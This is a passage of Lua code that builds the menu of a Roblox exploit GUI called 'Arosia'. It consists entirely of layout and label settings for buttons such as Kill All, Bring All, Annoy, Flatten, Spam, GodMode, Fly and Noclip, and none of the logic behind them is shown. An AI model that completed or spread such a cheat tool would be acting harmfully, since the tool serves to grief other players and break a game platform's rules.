1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.Draggable = true MainFrame.Position = UDim2.new(0.309, 0, -1, 0) MainFrame.Size = UDim2.new(0, 448, 0, 334) TopRow.Name = "TopRow" TopRow.Parent = MainFrame TopRow.BackgroundColor3 = Color3.new(0.129412, 0.129412, 0.129412) TopRow.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) TopRow.BorderSizePixel = 2 TopRow.Size = UDim2.new(0, 448, 0, 24) TopRow.ZIndex = 7 Title.Name = "Title" Title.Parent = TopRow Title.Active = true Title.BackgroundColor3 = Color3.new(1, 1, 1) Title.BackgroundTransparency = 1 Title.Size = UDim2.new(0, 90, 0, 24) Title.Font = Enum.Font.ArialBold Title.FontSize = Enum.FontSize.Size24 Title.Text = "Arosia " Title.TextColor3 = Color3.new(0.368627, 0.976471, 0.262745) Title.TextScaled = true Title.TextSize = 19 Title.TextWrapped = true Title.ZIndex = 8 CloseGUI.Name = "CloseGUI" CloseGUI.Parent = TopRow CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0.560000002, 166, 0.100000001, 0) CloseGUI.Size = UDim2.new(0, 38, 0, 24) CloseGUI.Font = Enum.Font.ArialBold CloseGUI.FontSize = Enum.FontSize.Size32 CloseGUI.Text = "X" CloseGUI.TextColor3 = Color3.new(0.615686, 0, 0) CloseGUI.TextSize = 30 CloseGUI.ZIndex = 8 FE_Check.Name = "FE_Check" FE_Check.Parent = TopRow FE_Check.BackgroundColor3 = Color3.new(1, 1, 1) FE_Check.BackgroundTransparency = 1 FE_Check.Position = UDim2.new(0.291458786, 0, 0, 0) FE_Check.Size = UDim2.new(0, 223, 0, 24) FE_Check.Font = Enum.Font.Highway FE_Check.FontSize = Enum.FontSize.Size14 FE_Check.Text = "Error loading FE Checker" FE_Check.TextColor3 = Color3.new(1, 1, 1) FE_Check.TextScaled = true FE_Check.TextSize = 14 FE_Check.TextWrapped = true FE_Check.ZIndex = 8 SideTabs.Name = "SideTabs" SideTabs.Parent = MainFrame SideTabs.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) SideTabs.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) SideTabs.BorderSizePixel = 2 SideTabs.Position = UDim2.new(0, 0, 0.0799999982, 0) SideTabs.Size = UDim2.new(0, 120, 0, 307) SideTabs.ZIndex = 5 TAB_LocalPlayer.Name = "TAB_LocalPlayer" TAB_LocalPlayer.Parent = SideTabs TAB_LocalPlayer.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255) TAB_LocalPlayer.BorderSizePixel = 0 TAB_LocalPlayer.Size = UDim2.new(0, 120, 0, 35) TAB_LocalPlayer.Font = Enum.Font.SourceSansBold TAB_LocalPlayer.FontSize = Enum.FontSize.Size24 TAB_LocalPlayer.Text = "Local Player" TAB_LocalPlayer.TextColor3 = Color3.new(0.882353, 0.882353, 0.882353) TAB_LocalPlayer.TextSize = 23 TAB_LocalPlayer.TextWrapped = true TAB_LocalPlayer.ZIndex = 6 TAB_Others.Name = "TAB_Others" TAB_Others.Parent = SideTabs TAB_Others.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255) TAB_Others.BorderSizePixel = 0 TAB_Others.Position = UDim2.new(0, 0, 0.130510315, 0) TAB_Others.Size = UDim2.new(0, 120, 0, 35) TAB_Others.Font = Enum.Font.SourceSansBold TAB_Others.FontSize = Enum.FontSize.Size28 TAB_Others.Text = "Others" TAB_Others.TextColor3 = Color3.new(0.882353, 0.882353, 0.882353) TAB_Others.TextSize = 27 TAB_Others.TextWrapped = true TAB_Others.ZIndex = 6 TAB_Scripts.Name = "TAB_Scripts" TAB_Scripts.Parent = SideTabs TAB_Scripts.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255) TAB_Scripts.BorderSizePixel = 0 TAB_Scripts.Position = UDim2.new(0, 0, 0.261020631, 0) TAB_Scripts.Size = UDim2.new(0, 120, 0, 35) TAB_Scripts.Font = Enum.Font.SourceSansBold TAB_Scripts.FontSize = Enum.FontSize.Size28 TAB_Scripts.Text = "Scripts" TAB_Scripts.TextColor3 = Color3.new(0.882353, 0.882353, 0.882353) TAB_Scripts.TextSize = 27 TAB_Scripts.TextWrapped = true TAB_Scripts.ZIndex = 6 TAB_Credit.Name = "TAB_Credit" TAB_Credit.Parent = SideTabs TAB_Credit.BackgroundColor3 = Color3.new(0.129412, 0.129412, 0.129412) TAB_Credit.BorderSizePixel = 0 TAB_Credit.Position = UDim2.new(0, 0, 0.880944669, 0) TAB_Credit.Size = UDim2.new(0, 120, 0, 37) TAB_Credit.Font = Enum.Font.SourceSansBold TAB_Credit.FontSize = Enum.FontSize.Size28 TAB_Credit.Text = "illremember" TAB_Credit.TextColor3 = Color3.new(0.882353, 0.882353, 0.882353) TAB_Credit.TextSize = 25 TAB_Credit.TextStrokeColor3 = Color3.new(1, 0, 0) TAB_Credit.TextStrokeTransparency = 0.80000001192093 TAB_Credit.TextWrapped = true TAB_Credit.ZIndex = 6 TAB_Games.Name = "TAB_Games" TAB_Games.Parent = SideTabs TAB_Games.BackgroundColor3 = Color3.new(0.337255, 0.337255, 0.337255) TAB_Games.BorderSizePixel = 0 TAB_Games.Position = UDim2.new(0, 0, 0.391530931, 0) TAB_Games.Size = UDim2.new(0, 120, 0, 35) TAB_Games.Font = Enum.Font.SourceSansBold TAB_Games.FontSize = Enum.FontSize.Size28 TAB_Games.Text = "Games" TAB_Games.TextColor3 = Color3.new(0.882353, 0.882353, 0.882353) TAB_Games.TextSize = 27 TAB_Games.TextWrapped = true TAB_Games.ZIndex = 6 Others.Name = "Others" Others.Parent = MainFrame Others.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8) Others.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) Others.BorderSizePixel = 2 Others.Position = UDim2.new(0.31400001, -21, 0.180000007, -33) Others.Size = UDim2.new(0, 328, 0, 307) Others.Visible = false PlayerUserEnter.Name = "PlayerUserEnter" PlayerUserEnter.Parent = Others PlayerUserEnter.BackgroundColor3 = Color3.new(0.65098, 0.65098, 0.65098) PlayerUserEnter.BorderSizePixel = 0 PlayerUserEnter.Position = UDim2.new(0.0612446219, 0, 0.0978827327, 0) PlayerUserEnter.Size = UDim2.new(0, 286, 0, 26) PlayerUserEnter.Font = Enum.Font.SourceSans PlayerUserEnter.FontSize = Enum.FontSize.Size14 PlayerUserEnter.Text = "" PlayerUserEnter.TextScaled = true PlayerUserEnter.TextSize = 14 PlayerUserEnter.TextWrapped = true Guidance.Name = "Guidance" Guidance.Parent = Others Guidance.BackgroundColor3 = Color3.new(1, 1, 1) Guidance.BackgroundTransparency = 1 Guidance.Position = UDim2.new(0.183733866, 0, 0, 0) Guidance.Size = UDim2.new(0, 209, 0, 24) Guidance.Font = Enum.Font.ArialBold Guidance.FontSize = Enum.FontSize.Size14 Guidance.Text = "Enter Player Username" Guidance.TextColor3 = Color3.new(0.258824, 0.690196, 0.211765) Guidance.TextScaled = true Guidance.TextSize = 14 Guidance.TextWrapped = true Annoy.Name = "Annoy" Annoy.Parent = Others Annoy.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Annoy.BorderSizePixel = 0 Annoy.Position = UDim2.new(0.0612553172, 0, 0.228393063, 0) Annoy.Size = UDim2.new(0, 78, 0, 26) Annoy.Font = Enum.Font.Arial Annoy.FontSize = Enum.FontSize.Size18 Annoy.Text = "Annoy" Annoy.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Annoy.TextSize = 18 Annoy.TextWrapped = true Teleport.Name = "Teleport" Teleport.Parent = Others Teleport.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Teleport.BorderSizePixel = 0 Teleport.Position = UDim2.new(0.367531896, 0, 0.228393063, 0) Teleport.Size = UDim2.new(0, 78, 0, 26) Teleport.Font = Enum.Font.Arial Teleport.FontSize = Enum.FontSize.Size18 Teleport.Text = "Teleport" Teleport.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Teleport.TextSize = 18 Teleport.TextWrapped = true View.Name = "View" View.Parent = Others View.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) View.BorderSizePixel = 0 View.Position = UDim2.new(0.673808455, 0, 0.228393063, 0) View.Size = UDim2.new(0, 78, 0, 26) View.Font = Enum.Font.Arial View.FontSize = Enum.FontSize.Size18 View.Text = "View" View.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) View.TextSize = 18 View.TextWrapped = true KillAll.Name = "KillAll" KillAll.Parent = Others KillAll.BackgroundColor3 = Color3.new(0.423529, 0.0862745, 0.0627451) KillAll.BorderSizePixel = 0 KillAll.Position = UDim2.new(0.0612446219, 0, 0.880944669, 0) KillAll.Size = UDim2.new(0, 78, 0, 26) KillAll.Font = Enum.Font.Arial KillAll.FontSize = Enum.FontSize.Size18 KillAll.Text = "Kill All" KillAll.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) KillAll.TextSize = 18 KillAll.TextWrapped = true Attach.Name = "Attach" Attach.Parent = Others Attach.BackgroundColor3 = Color3.new(0.415686, 0.423529, 0.0666667) Attach.BorderSizePixel = 0 Attach.Position = UDim2.new(0.673808455, 0, 0.652551532, 0) Attach.Size = UDim2.new(0, 78, 0, 26) Attach.Font = Enum.Font.Arial Attach.FontSize = Enum.FontSize.Size18 Attach.Text = "Attach" Attach.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Attach.TextSize = 18 Attach.TextWrapped = true Bring.Name = "Bring" Bring.Parent = Others Bring.BackgroundColor3 = Color3.new(0.415686, 0.423529, 0.0666667) Bring.BorderSizePixel = 0 Bring.Position = UDim2.new(0.367531896, 0, 0.652551532, 0) Bring.Size = UDim2.new(0, 78, 0, 26) Bring.Font = Enum.Font.Arial Bring.FontSize = Enum.FontSize.Size18 Bring.Text = "Bring" Bring.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Bring.TextSize = 18 Bring.TextWrapped = true Guidance2.Name = "Guidance2" Guidance2.Parent = Others Guidance2.BackgroundColor3 = Color3.new(1, 1, 1) Guidance2.BackgroundTransparency = 1 Guidance2.Position = UDim2.new(0.153138295, 0, 0.522041261, 0) Guidance2.Size = UDim2.new(0, 227, 0, 40) Guidance2.Font = Enum.Font.ArialBold Guidance2.FontSize = Enum.FontSize.Size14 Guidance2.Text = "Golden buttons require tools in your backpack before using" Guidance2.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) Guidance2.TextScaled = true Guidance2.TextSize = 14 Guidance2.TextStrokeColor3 = Color3.new(1, 0.870588, 0.223529) Guidance2.TextStrokeTransparency = 0.80000001192093 Guidance2.TextWrapped = true Kill.Name = "Kill" Kill.Parent = Others Kill.BackgroundColor3 = Color3.new(0.415686, 0.423529, 0.0666667) Kill.BorderSizePixel = 0 Kill.Position = UDim2.new(0.0612553172, 0, 0.652551532, 0) Kill.Size = UDim2.new(0, 78, 0, 26) Kill.Font = Enum.Font.Arial Kill.FontSize = Enum.FontSize.Size18 Kill.Text = "Kill" Kill.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Kill.TextSize = 18 Kill.TextWrapped = true BringAll.Name = "Bring" BringAll.Parent = Others BringAll.BackgroundColor3 = Color3.new(0.423529, 0.0862745, 0.0627451) BringAll.BorderSizePixel = 0 BringAll.Position = UDim2.new(0.367467731, 0, 0.880944669, 0) BringAll.Size = UDim2.new(0, 78, 0, 26) BringAll.Font = Enum.Font.Arial BringAll.FontSize = Enum.FontSize.Size18 BringAll.Text = "Bring All" BringAll.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) BringAll.TextSize = 18 BringAll.TextWrapped = true AttachAll.Name = "Attach" AttachAll.Parent = Others AttachAll.BackgroundColor3 = Color3.new(0.423529, 0.0862745, 0.0627451) AttachAll.BorderSizePixel = 0 AttachAll.Position = UDim2.new(0.673690796, 0, 0.880944669, 0) AttachAll.Size = UDim2.new(0, 78, 0, 26) AttachAll.Font = Enum.Font.Arial AttachAll.FontSize = Enum.FontSize.Size18 AttachAll.Text = "Attach All" AttachAll.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) AttachAll.TextSize = 18 AttachAll.TextWrapped = true Flatten.Name = "Flatten" Flatten.Parent = Others Flatten.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Flatten.BorderSizePixel = 0 Flatten.Position = UDim2.new(0.367531896, 0, 0.424158514, 0) Flatten.Size = UDim2.new(0, 78, 0, 26) Flatten.Font = Enum.Font.Arial Flatten.FontSize = Enum.FontSize.Size18 Flatten.Text = "Flatten" Flatten.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Flatten.TextSize = 18 Flatten.TextWrapped = true Guidance3.Name = "Guidance3" Guidance3.Parent = Others Guidance3.BackgroundColor3 = Color3.new(1, 1, 1) Guidance3.BackgroundTransparency = 1 Guidance3.Position = UDim2.new(0.153138295, 0, 0.750434279, 0) Guidance3.Size = UDim2.new(0, 227, 0, 40) Guidance3.Font = Enum.Font.ArialBold Guidance3.FontSize = Enum.FontSize.Size14 Guidance3.Text = "Red buttons require many tools in your backpack before using" Guidance3.TextColor3 = Color3.new(0.137255, 0.137255, 0.137255) Guidance3.TextScaled = true Guidance3.TextSize = 14 Guidance3.TextStrokeColor3 = Color3.new(1, 0.266667, 0.137255) Guidance3.TextStrokeTransparency = 0.80000001192093 Guidance3.TextWrapped = true NoneSelected.Name = "NoneSelected" NoneSelected.Parent = MainFrame NoneSelected.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8) NoneSelected.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) NoneSelected.BorderSizePixel = 2 NoneSelected.Position = UDim2.new(0.31400001, -21, 0.180000007, -33) NoneSelected.Size = UDim2.new(0, 328, 0, 307) NoneSelectedText1.Name = "NoneSelectedText1" NoneSelectedText1.Parent = NoneSelected NoneSelectedText1.BackgroundColor3 = Color3.new(1, 1, 1) NoneSelectedText1.BackgroundTransparency = 1 NoneSelectedText1.Position = UDim2.new(0.184861064, 0, 0.0326275788, 0) NoneSelectedText1.Size = UDim2.new(0, 200, 0, 50) NoneSelectedText1.Font = Enum.Font.ArialBold NoneSelectedText1.FontSize = Enum.FontSize.Size14 NoneSelectedText1.Text = "Arosia" NoneSelectedText1.TextColor3 = Color3.new(0.337255, 0.85098, 0.258824) NoneSelectedText1.TextScaled = true NoneSelectedText1.TextSize = 14 NoneSelectedText1.TextWrapped = true NoneSelectedText2.Name = "NoneSelectedText2" NoneSelectedText2.Parent = NoneSelected NoneSelectedText2.BackgroundColor3 = Color3.new(1, 1, 1) NoneSelectedText2.BackgroundTransparency = 1 NoneSelectedText2.Position = UDim2.new(0.184861064, -31, 0.195765465, 0) NoneSelectedText2.Size = UDim2.new(0, 272, 0, 72) NoneSelectedText2.Font = Enum.Font.ArialBold NoneSelectedText2.FontSize = Enum.FontSize.Size14 NoneSelectedText2.Text = "Dedicated to bringing power into FE games" NoneSelectedText2.TextColor3 = Color3.new(0.458824, 0.458824, 0.458824) NoneSelectedText2.TextScaled = true NoneSelectedText2.TextSize = 14 NoneSelectedText2.TextWrapped = true NoneSelectedText3.Name = "NoneSelectedText3" NoneSelectedText3.Parent = NoneSelected NoneSelectedText3.BackgroundColor3 = Color3.new(1, 1, 1) NoneSelectedText3.BackgroundTransparency = 1 NoneSelectedText3.Position = UDim2.new(0.0918669328, 0, 0.652551532, 0) NoneSelectedText3.Size = UDim2.new(0, 272, 0, 72) NoneSelectedText3.Font = Enum.Font.ArialBold NoneSelectedText3.FontSize = Enum.FontSize.Size14 NoneSelectedText3.Text = "By illremember" NoneSelectedText3.TextColor3 = Color3.new(0.458824, 0.458824, 0.458824) NoneSelectedText3.TextScaled = true NoneSelectedText3.TextSize = 14 NoneSelectedText3.TextStrokeColor3 = Color3.new(1, 0.027451, 0.027451) NoneSelectedText3.TextStrokeTransparency = 0.89999997615814 NoneSelectedText3.TextWrapped = true LocalPlayer.Name = "LocalPlayer" LocalPlayer.Parent = MainFrame LocalPlayer.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8) LocalPlayer.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) LocalPlayer.BorderSizePixel = 2 LocalPlayer.Position = UDim2.new(0.31400001, -21, 0.180000007, -33) LocalPlayer.Size = UDim2.new(0, 328, 0, 307) LocalPlayer.Visible = false GodMode.Name = "GodMode" GodMode.Parent = LocalPlayer GodMode.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) GodMode.BorderSizePixel = 0 GodMode.Position = UDim2.new(0.0306223109, 0, 0.0326275788, 0) GodMode.Size = UDim2.new(0, 80, 0, 26) GodMode.Font = Enum.Font.Arial GodMode.FontSize = Enum.FontSize.Size18 GodMode.Text = "GodMode" GodMode.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) GodMode.TextSize = 18 GodMode.TextWrapped = true Fly.Name = "Fly" Fly.Parent = LocalPlayer Fly.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Fly.BorderSizePixel = 0 Fly.Position = UDim2.new(0.398090035, 0, 0.0326275788, 0) Fly.Size = UDim2.new(0, 80, 0, 26) Fly.Font = Enum.Font.Arial Fly.FontSize = Enum.FontSize.Size18 Fly.Text = "Fly" Fly.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Fly.TextSize = 18 Fly.TextWrapped = true Speed.Name = "Speed" Speed.Parent = LocalPlayer Speed.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Speed.BorderSizePixel = 0 Speed.Position = UDim2.new(0.0306223109, 0, 0.261020631, 0) Speed.Size = UDim2.new(0, 80, 0, 26) Speed.Font = Enum.Font.Arial Speed.FontSize = Enum.FontSize.Size18 Speed.Text = "Speed" Speed.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Speed.TextSize = 18 Speed.TextWrapped = true Speed_TXTBOX.Name = "Speed_TXTBOX" Speed_TXTBOX.Parent = LocalPlayer Speed_TXTBOX.BackgroundColor3 = Color3.new(0.65098, 0.65098, 0.65098) Speed_TXTBOX.BorderSizePixel = 0 Speed_TXTBOX.Position = UDim2.new(0.275600791, 0, 0.261020631, 0) Speed_TXTBOX.Size = UDim2.new(0, 40, 0, 26) Speed_TXTBOX.Font = Enum.Font.SourceSans Speed_TXTBOX.FontSize = Enum.FontSize.Size14 Speed_TXTBOX.Text = "" Speed_TXTBOX.TextScaled = true Speed_TXTBOX.TextSize = 14 Speed_TXTBOX.TextWrapped = true JumpHeight.Name = "JumpHeight" JumpHeight.Parent = LocalPlayer JumpHeight.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) JumpHeight.BorderSizePixel = 0 JumpHeight.Position = UDim2.new(0.459334642, 0, 0.261020631, 0) JumpHeight.Size = UDim2.new(0, 80, 0, 26) JumpHeight.Font = Enum.Font.Arial JumpHeight.FontSize = Enum.FontSize.Size18 JumpHeight.Text = "JumpHeight" JumpHeight.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) JumpHeight.TextSize = 15 JumpHeight.TextWrapped = true JumpHeight_TXTBOX.Name = "JumpHeight_TXTBOX" JumpHeight_TXTBOX.Parent = LocalPlayer JumpHeight_TXTBOX.BackgroundColor3 = Color3.new(0.65098, 0.65098, 0.65098) JumpHeight_TXTBOX.BorderSizePixel = 0 JumpHeight_TXTBOX.Position = UDim2.new(0.704313159, 0, 0.261020631, 0) JumpHeight_TXTBOX.Size = UDim2.new(0, 40, 0, 26) JumpHeight_TXTBOX.Font = Enum.Font.SourceSans JumpHeight_TXTBOX.FontSize = Enum.FontSize.Size14 JumpHeight_TXTBOX.Text = "" JumpHeight_TXTBOX.TextScaled = true JumpHeight_TXTBOX.TextSize = 14 JumpHeight_TXTBOX.TextWrapped = true Chat.Name = "Chat" Chat.Parent = LocalPlayer Chat.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Chat.BorderSizePixel = 0 Chat.Position = UDim2.new(0.0306223109, 0, 0.456786126, 0) Chat.Size = UDim2.new(0, 80, 0, 26) Chat.Font = Enum.Font.Arial Chat.FontSize = Enum.FontSize.Size18 Chat.Text = "Chat" Chat.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Chat.TextSize = 18 Chat.TextWrapped = true Chat_TXTBOX.Name = "Chat_TXTBOX" Chat_TXTBOX.Parent = LocalPlayer Chat_TXTBOX.BackgroundColor3 = Color3.new(0.65098, 0.65098, 0.65098) Chat_TXTBOX.BorderSizePixel = 0 Chat_TXTBOX.Position = UDim2.new(0.275600791, 0, 0.456786126, 0) Chat_TXTBOX.Size = UDim2.new(0, 222, 0, 26) Chat_TXTBOX.Font = Enum.Font.SourceSans Chat_TXTBOX.FontSize = Enum.FontSize.Size14 Chat_TXTBOX.Text = "" Chat_TXTBOX.TextScaled = true Chat_TXTBOX.TextSize = 14 Chat_TXTBOX.TextWrapped = true Respawn.Name = "Respawn" Respawn.Parent = LocalPlayer Respawn.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Respawn.BorderSizePixel = 0 Respawn.Position = UDim2.new(0.734935462, 0, 0.0326275788, 0) Respawn.Size = UDim2.new(0, 80, 0, 26) Respawn.Font = Enum.Font.Arial Respawn.FontSize = Enum.FontSize.Size18 Respawn.Text = "Respawn" Respawn.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Respawn.TextSize = 18 Respawn.TextWrapped = true HipHeight.Name = "HipHeight" HipHeight.Parent = LocalPlayer HipHeight.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) HipHeight.BorderSizePixel = 0 HipHeight.Position = UDim2.new(0.0306223109, 0, 0.358903378, 0) HipHeight.Size = UDim2.new(0, 80, 0, 26) HipHeight.Font = Enum.Font.Arial HipHeight.FontSize = Enum.FontSize.Size18 HipHeight.Text = "HipHeight" HipHeight.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) HipHeight.TextSize = 18 HipHeight.TextWrapped = true HipHeight_TXTBOX.Name = "HipHeight_TXTBOX" HipHeight_TXTBOX.Parent = LocalPlayer HipHeight_TXTBOX.BackgroundColor3 = Color3.new(0.65098, 0.65098, 0.65098) HipHeight_TXTBOX.BorderSizePixel = 0 HipHeight_TXTBOX.Position = UDim2.new(0.275600791, 0, 0.358903378, 0) HipHeight_TXTBOX.Size = UDim2.new(0, 40, 0, 26) HipHeight_TXTBOX.Font = Enum.Font.SourceSans HipHeight_TXTBOX.FontSize = Enum.FontSize.Size14 HipHeight_TXTBOX.Text = "" HipHeight_TXTBOX.TextScaled = true HipHeight_TXTBOX.TextSize = 14 HipHeight_TXTBOX.TextWrapped = true Noclip.Name = "Noclip" Noclip.Parent = LocalPlayer Noclip.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Noclip.BorderSizePixel = 0 Noclip.Position = UDim2.new(0.0306223109, 0, 0.130510315, 0) Noclip.Size = UDim2.new(0, 80, 0, 26) Noclip.Font = Enum.Font.Arial Noclip.FontSize = Enum.FontSize.Size18 Noclip.Text = "Noclip" Noclip.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Noclip.TextSize = 18 Noclip.TextWrapped = true Sit.Name = "Sit" Sit.Parent = LocalPlayer Sit.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Sit.BorderSizePixel = 0 Sit.Position = UDim2.new(0.398090035, 0, 0.130510315, 0) Sit.Size = UDim2.new(0, 80, 0, 26) Sit.Font = Enum.Font.Arial Sit.FontSize = Enum.FontSize.Size18 Sit.Text = "Sit" Sit.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Sit.TextSize = 18 Sit.TextWrapped = true Jump.Name = "Jump" Jump.Parent = LocalPlayer Jump.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Jump.BorderSizePixel = 0 Jump.Position = UDim2.new(0.734935462, 0, 0.130510315, 0) Jump.Size = UDim2.new(0, 80, 0, 26) Jump.Font = Enum.Font.Arial Jump.FontSize = Enum.FontSize.Size18 Jump.Text = "Jump" Jump.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Jump.TextSize = 18 Jump.TextWrapped = true HideName.Name = "HideName" HideName.Parent = LocalPlayer HideName.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) HideName.BorderSizePixel = 0 HideName.Position = UDim2.new(0.0306223109, 0, 0.880944669, 0) HideName.Size = UDim2.new(0, 80, 0, 26) HideName.Font = Enum.Font.Arial HideName.FontSize = Enum.FontSize.Size18 HideName.Text = "HideName" HideName.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) HideName.TextSize = 18 HideName.TextWrapped = true Spam.Name = "Spam" Spam.Parent = LocalPlayer Spam.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Spam.BorderSizePixel = 0 Spam.Position = UDim2.new(0.0306223109, 0, 0.554668844, 0) Spam.Size = UDim2.new(0, 80, 0, 26) Spam.Font = Enum.Font.Arial Spam.FontSize = Enum.FontSize.Size18 Spam.Text = "Spam" Spam.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Spam.TextSize = 18 Spam.TextWrapped = true Freeze.Name = "Freeze" Freeze.Parent = LocalPlayer Freeze.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Freeze.BorderSizePixel = 0 Freeze.Position = UDim2.new(0.398090035, 0, 0.880944669, 0) Freeze.Size = UDim2.new(0, 80, 0, 26) Freeze.Font = Enum.Font.Arial Freeze.FontSize = Enum.FontSize.Size18 Freeze.Text = "Freeze" Freeze.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Freeze.TextSize = 18 Freeze.TextWrapped = true Btools.Name = "Btools" Btools.Parent = LocalPlayer Btools.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Btools.BorderSizePixel = 0 Btools.Position = UDim2.new(0.0306223109, 0, 0.783061862, 0) Btools.Size = UDim2.new(0, 80, 0, 26) Btools.Font = Enum.Font.Arial Btools.FontSize = Enum.FontSize.Size18 Btools.Text = "Btools" Btools.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Btools.TextSize = 18 Btools.TextWrapped = true Spin.Name = "Spin" Spin.Parent = LocalPlayer Spin.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Spin.BorderSizePixel = 0 Spin.Position = UDim2.new(0.398090035, 0, 0.783061862, 0) Spin.Size = UDim2.new(0, 80, 0, 26) Spin.Font = Enum.Font.Arial Spin.FontSize = Enum.FontSize.Size18 Spin.Text = "Spin" Spin.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Spin.TextSize = 18 Spin.TextWrapped = true NoLimbs.Name = "NoLimbs" NoLimbs.Parent = LocalPlayer NoLimbs.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) NoLimbs.BorderSizePixel = 0 NoLimbs.Position = UDim2.new(0.734935462, 0, 0.880944669, 0) NoLimbs.Size = UDim2.new(0, 80, 0, 26) NoLimbs.Font = Enum.Font.Arial NoLimbs.FontSize = Enum.FontSize.Size18 NoLimbs.Text = "NoLimbs" NoLimbs.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) NoLimbs.TextSize = 18 NoLimbs.TextWrapped = true Seizure.Name = "Seizure" Seizure.Parent = LocalPlayer Seizure.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Seizure.BorderSizePixel = 0 Seizure.Position = UDim2.new(0.734935462, 0, 0.783061862, 0) Seizure.Size = UDim2.new(0, 80, 0, 26) Seizure.Font = Enum.Font.Arial Seizure.FontSize = Enum.FontSize.Size18 Seizure.Text = "Seizure" Seizure.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Seizure.TextSize = 18 Seizure.TextWrapped = true Games.Name = "Games" Games.Parent = MainFrame Games.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8) Games.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) Games.BorderSizePixel = 2 Games.Position = UDim2.new(0.31400001, -21, 0.180000007, -33) Games.Size = UDim2.new(0, 328, 0, 307) Games.Visible = false Scripts.Name = "Scripts" Scripts.Parent = MainFrame Scripts.BackgroundColor3 = Color3.new(0.8, 0.8, 0.8) Scripts.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) Scripts.BorderSizePixel = 2 Scripts.Position = UDim2.new(0.31400001, -21, 0.180000007, -33) Scripts.Size = UDim2.new(0, 328, 0, 307) Scripts.Visible = false Energize.Name = "Energize" Energize.Parent = Scripts Energize.BackgroundColor3 = Color3.new(0.960784, 0.419608, 0.145098) Energize.BorderColor3 = Color3.new(0.960784, 0.419608, 0.145098) Energize.BorderSizePixel = 3 Energize.Position = UDim2.new(0.183430299, 0, 0.0326275788, 0) Energize.Size = UDim2.new(0, 200, 0, 30) Energize.Font = Enum.Font.ArialBold Energize.FontSize = Enum.FontSize.Size18 Energize.Text = "Animation GUI for R6/R15" Energize.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Energize.TextScaled = true Energize.TextSize = 18 Energize.TextWrapped = true GlitchMax.Name = "GlitchMax" GlitchMax.Parent = Scripts GlitchMax.BackgroundColor3 = Color3.new(0.298039, 0.509804, 0.901961) GlitchMax.BorderColor3 = Color3.new(0.298039, 0.509804, 0.901961) GlitchMax.BorderSizePixel = 3 GlitchMax.Position = UDim2.new(0.183430299, 0, 0.358903378, 0) GlitchMax.Size = UDim2.new(0, 200, 0, 30) GlitchMax.Font = Enum.Font.ArialBold GlitchMax.FontSize = Enum.FontSize.Size28 GlitchMax.Text = "GlitchMax GUI" GlitchMax.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) GlitchMax.TextSize = 25 GlitchMax.TextWrapped = true Energize_TXT.Name = 